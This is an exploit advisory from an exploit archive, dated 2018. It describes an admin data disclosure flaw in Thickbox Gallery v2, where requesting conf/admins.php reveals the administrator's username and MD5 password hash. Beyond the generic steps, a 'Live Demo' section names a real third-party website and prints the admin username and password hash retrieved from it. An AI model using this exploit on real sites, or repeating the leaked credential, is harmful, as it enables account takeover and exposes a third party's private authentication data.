Thickbox Gallery v2 (admins.php) Admin Data Disclosure Vulnerability

====================================================================
Thickbox Gallery v2 (admins.php) Admin Data Disclosure Vulnerability
====================================================================



[+] Arbitrary Admin Data Disclosure

    - Go here and you will see the admin data ( login name + crypted password as MD5 )

       http://localhost/[Path]/conf/admins.php

    - Admin data :

          a:1:{s:5:"admin";s:32:"d73ed8a01f624fcb878296bc7ff302bc";}

    - Now extract the admin username and the hash :

        Username : admin

        Password : d73ed8a01f624fcb878296bc7ff302bc

[+] Live Demo

         http://www.davilin.com/tbg/conf/admins.php

    - Retrived :

          a:1:{s:8:"ytakenak";s:32:"56bd1d32bcb1fbd2609e4d7634febbd1";}

    - Name + Password

        Username : ytakenak
      
        Password : 56bd1d32bcb1fbd2609e4d7634febbd1
   

##########################################################################################



#  0day.today [2018-01-04]  #